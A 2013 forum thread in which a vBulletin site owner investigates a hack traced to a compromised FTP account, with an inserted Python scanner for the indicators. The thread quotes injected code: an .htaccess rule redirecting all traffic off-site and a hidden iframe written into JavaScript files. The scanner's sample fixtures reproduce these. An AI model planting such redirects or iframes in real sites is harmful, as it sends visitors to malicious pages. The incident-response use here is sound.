Looking to dig deeper into how forum was hacked


eteanga
01-31-2013, 08:54 AM
Hey,

for a second time, our forum has been hacked. The following happens:

.htaccess is edited to redirect all queries to another URL
JavaScript files are appended with iFrame code
New .htaccess files are created in all subfolders, redirecting all queries to another URL


The .htaccess file included this new line:
RewriteRule ^.*$ http://senior-fun-shooters.de/mccd.html?h=XXX [L,R]

iFrame code looks like:
document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://senior-fun-shooters.de/mccd.html?j=XXX></iframe>');

Forum technical details:

vBulletin 4.2.0 Patch Level 3
vbSEO and vbSEO :: Sitemap Generator installed
GlowHost - Spam-O-Matic installed


This is the second time this has happened, so I suspect there's a known hack allowing these changes to be made. It could be a server permissions problem on our side too. Do you have any pointers for where this hack is already discussed?
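One way to sweep a webroot for the two indicators described in this post (an .htaccess RewriteRule that redirects to an external host, and a document.write'd iframe appended to a .js file), as an added example that is not from the thread. It builds constructed sample files in a temp directory and uses a placeholder hostname (attacker.example) rather than the domain quoted above.

```python
import os
import re
import tempfile
from pathlib import Path

# Constructed sample files mirroring the reported indicators; attacker.example is a placeholder.
SAMPLE_FILES = {
    ".htaccess": "RewriteEngine On\nRewriteRule ^.*$ http://attacker.example/landing.html?h=XXX [L,R]\n",
    "js/app.js": "function init(){}\n\ndocument.write('<iframe name=Twitter height=2 width=2 "
                 "src=http://attacker.example/landing.html?j=XXX></iframe>');\n",
    "js/clean.js": "function ok(){ return 1; }\n",
    "forum/.htaccess": "RewriteRule ^(.*)$ /index.php [L]\n",  # internal rewrite, benign
}

# A RewriteRule whose target is an absolute URL (redirects off-site), checked per line.
EXTERNAL_REWRITE = re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I | re.M)
# An iframe emitted through document.write, the injection pattern seen in the appended JS.
IFRAME_WRITE = re.compile(r"document\.write\(\s*['\"]\s*<iframe", re.I)


def scan_tree(root):
    """Return sorted (relative path, indicator) pairs for suspicious files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):  # os.walk lists dotfiles such as .htaccess
        for name in files:
            path = Path(dirpath, name)
            text = path.read_text(errors="replace")
            rel = path.relative_to(root).as_posix()
            if name == ".htaccess" and EXTERNAL_REWRITE.search(text):
                hits.append((rel, "external RewriteRule redirect"))
            elif path.suffix == ".js" and IFRAME_WRITE.search(text):
                hits.append((rel, "document.write iframe injection"))
    return sorted(hits)


def scan_samples():
    """Write the constructed files to a temp dir and scan it; used for the demo and the test."""
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            p = Path(tmp, rel)
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
        return scan_tree(tmp)


if __name__ == "__main__":
    for rel, why in scan_samples():
        print(f"{rel}: {why}")
```

Point `scan_tree` at the real forum directory to list every file carrying either indicator; the two benign samples show it does not flag internal rewrites or untouched scripts.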

betterthanyours
01-31-2013, 09:17 AM
Are you on dedicated or shared hosting? Sounds like the hosting environment is not secure...

eteanga
01-31-2013, 11:14 AM
It is on our virtual private server, so we do control the permissions (that's not to say that our permissions are all set correctly...)

betterthanyours
01-31-2013, 11:39 AM
Why don't you start with posting permissions for the directories and also the hosting environment's OS, current security modules installed, etc.

eteanga
01-31-2013, 04:48 PM
Permissions for the forum folder itself, and its subfolders, are `drwxr-xr-x`.

It's running on CentOS Linux. As it's a managed server, I don't have specifics on current security modules installed.

Is what I mentioned a known security hack?

You are still of the mind that this could be prevented by correct folder permissions, am I right?

Lynne
01-31-2013, 05:22 PM
Have you checked your server logs to find the IP of the person who did this? Then check your access_logs for that IP and see what they did on your site.

betterthanyours
02-01-2013, 10:00 AM
Do what Lynne said also. Access and server logs will tell you how and what happened. Most website vulnerabilities are due to the host not setting up a secure environment....

eteanga
02-01-2013, 01:57 PM
Thanks for all the advice.

Our Apache logs certainly show the time the 404 responses began to spring up. However, there does not seem to be more access information than that. I could be wrong, of course, and we'll seek the help of an expert in the area of Linux.

eteanga
02-04-2013, 10:50 AM
I can confirm that this hack took place through FTP access.

That means it was not a misconfigured server or vBulletin's fault.

How the strong FTP password was cracked is another question. It was an account created specifically for a past vBulletin contractor. Either the password was brute-force guessed (which I don't suspect), or the contractor's machine or FTP communication with our server was compromised.

nhawk
02-04-2013, 11:35 AM
Lock down FTP access to allow access from only known, trusted IP addresses through your firewall. You should be able to do that through your server control panel.

And actually on a running site that isn't being updated for any reason, there's no reason to allow any FTP access to the server at all.

eteanga
02-05-2013, 01:27 PM
Good tip, nhawk. We don't use FTP at all for our site updates, so we better lock it down.